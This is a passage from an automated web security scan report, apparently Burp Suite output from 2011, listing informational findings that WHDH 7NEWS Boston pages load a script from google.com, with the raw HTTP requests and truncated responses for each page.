Date: Tue, 25 Jan 2011 00:00:26 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 644
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:28:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close
Content-Length: 33268

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston South News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1569. http://www1.whdh.com/news/main/local/worcester-area/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/worcester-area/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/worcester-area/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=1746
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 33159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Worcester, Massachussetts Area News</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1570. http://www1.whdh.com/news/main/national/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/national/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/national/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33220
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS National US News</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1571. http://www1.whdh.com/news/main/national/tragedy-in-tucson/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/national/tragedy-in-tucson/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/national/tragedy-in-tucson/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1747
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34788
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS National US News</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1572. http://www1.whdh.com/news/main/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/politics/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/politics/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=796
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:07:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33251
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Politics</title>
<meta name="publisher" content="New England N
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1573. http://www1.whdh.com/news/main/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/sports/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/sports/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:38:58 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 973
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:07:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 33196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Sports</title>
<meta name="publisher" content="New England New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1574. http://www1.whdh.com/news/main/viewervoices/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/viewervoices/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/viewervoices/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33153
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title></title>
<meta name="publisher" content="New England News Station Boston Channel 7 W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1575. http://www1.whdh.com/news/main/world/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/world/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/world/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32994
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS World News</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1576. http://www1.whdh.com/newsteam/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/newsteam/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /newsteam/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1737
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:25:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28153
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV News Team</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1577. http://www1.whdh.com/privacypolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/privacypolicy

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /privacypolicy HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: privacypolicy.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 19843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Privacy Policy</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1578. http://www1.whdh.com/rss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/rss/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /rss/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=5101
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:21:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18243
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - RSS Feeds and Widgets</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1579. http://www1.whdh.com/sales/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/sales/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /sales/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

21.1580. http://www1.whdh.com/slideshows/view/BitterBlastTemperatures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/BitterBlastTemperatures

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/BitterBlastTemperatures HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21954
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Bitter Blast Temperatures</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1581. http://www1.whdh.com/slideshows/view/FunintheSnow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/FunintheSnow

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/FunintheSnow HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23022
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Fun in the Snow</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1582. http://www1.whdh.com/slideshows/view/January12thStormPets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January12thStormPets

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/January12thStormPets HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 94
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:55:49 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:55:49 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 22779
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Winter Weather - Snowy Pets</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1583. http://www1.whdh.com/slideshows/view/January12thTreesDown previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January12thTreesDown

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/January12thTreesDown HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23062
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 12th Trees Down</title>
<meta name="publisher" content="New En
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1584. http://www1.whdh.com/slideshows/view/January18WinterStorm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January18WinterStorm

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/January18WinterStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:25 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:25 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23072
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 18 Snow/Ice Storm</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1585. http://www1.whdh.com/slideshows/view/January21SnowStorm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January21SnowStorm

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /slideshows/view/January21SnowStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21934
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 21 Snow Storm</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1586. http://www1.whdh.com/stormforce/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
